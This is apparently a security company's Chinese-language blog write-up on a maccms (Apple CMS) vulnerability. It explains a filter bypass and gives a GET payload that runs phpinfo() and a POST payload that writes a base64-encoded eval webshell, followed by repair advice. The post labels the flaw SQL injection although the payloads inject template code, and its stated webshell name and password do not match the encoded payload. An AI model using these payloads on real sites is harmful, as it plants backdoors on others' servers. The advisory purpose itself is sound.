Copyright ? 2015 深圳市鑫惠廣網絡科技有限公司 粵ICP備2023111395號
蘋果cms系統,是目前很多電影網站都在使用的一套網站系統,開源,免費,擴展性較好,支持一鍵采集,偽靜態化,高并發的同時承載,獲得的很多站長的喜歡,于近日被網站安全檢測發現,maccms存在網站漏洞,sql注入盲射獲取數據庫的管理員賬號密碼,關于該漏洞的詳情,我們仔細分析看下.
maccms漏洞分析與修復
蘋果CMS采用的是php語言開發的代碼,使用的數據庫是mysql類型,這種架構是比較常用的,也是比較穩定的,但是在安全方面出現的問題是比較多的,這次發現的是sql注入漏洞,在網站的根目錄下的inc文件里的module目錄下的vod.php代碼如下圖所示:
代碼里的empty($wd函數,在進行判斷如果是,或者不是的邏輯過程當中,會將前段用戶訪問帶來的參數,進行安全過濾,我們跟進代碼來追尋到蘋果CMS的配置文件,在function.php配置文件代碼李看到對網站的所有請求方式包括get、post、cookies的提交方式都強制性的進行了安全轉義。網站漏洞問題的發生就在這里.
我們仔細又發現,maccms使用了360安全提供的防止sql注入攔截代碼。360的防止sql注入是好幾年前開發,并公開在網絡上的,已經很久沒有更新維護了并且還存在sql注入代碼繞過的情況,參數值之間進行實體轉換的時候,360的sql攔截規則沒有對空白符以及反斜杠進行攔截,導致可以繞過插入惡意參數,直接請求到蘋果cms后端數據庫中去,獲取蘋果CMS的管理員賬號密碼。
我們來看下如何利用蘋果CMS的漏洞,從上面漏洞發生的細節里可以看出,是因為攔截sql注入語句的過程中存在可以被繞過的漏洞。我們來使用%0b,以及空格對代碼進行注入,sql語句在拼接中,可以插入反斜杠進行單引號的報錯,從而繞過蘋果CMS的安全攔截。語句如下:
GET請求:
http://127.0.0.1/index.PHP?m=vod-search&wd={if-A:phpinfo()}{endif-A}
可以直接看php的具體信息
POST請求
可以直接獲取webshell
http://127.0.0.1/index.PHP?m=vod-search
POST內容如下:
wd={if-A:print(fputs%28fopen%28_decode%28Yy5waHA%29,w%29,_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}
可以直接生成帶有一句話木馬后門的代碼,文件名為safe.php,一句話木馬鏈接密碼是safe.
如何修復蘋果cms網站漏洞呢?
對網站漏洞的修復我們要知道漏洞產生的原因,以及為何會繞過蘋果CMS的安全過濾,maccms使用的addslash安全函數,sql中沒有加單引號的安全防護,in字句也很容易忘記加引號,再一個后期處理安全過濾的時候可以插入單引號,stripslash導致可以加入單引號,編解碼導致繞過addslash,使用urldecode編碼進行注入繞過,根據上面提出的漏洞繞過,我們SINE安全提出漏洞修復的建議是:對URL解碼進行雙層的轉義,對get,post,cookies的攔截規則進行安全更新,加強空格,以及百分符號的攔截,如果對程序代碼不熟悉的話建議咨詢專業的網站安全公司來處理解決。
如未特殊注明,文章均來源于網絡! 轉載請注明來自:http://www.
Copyright ? 2015 深圳市鑫惠廣網絡科技有限公司 粵ICP備2023111395號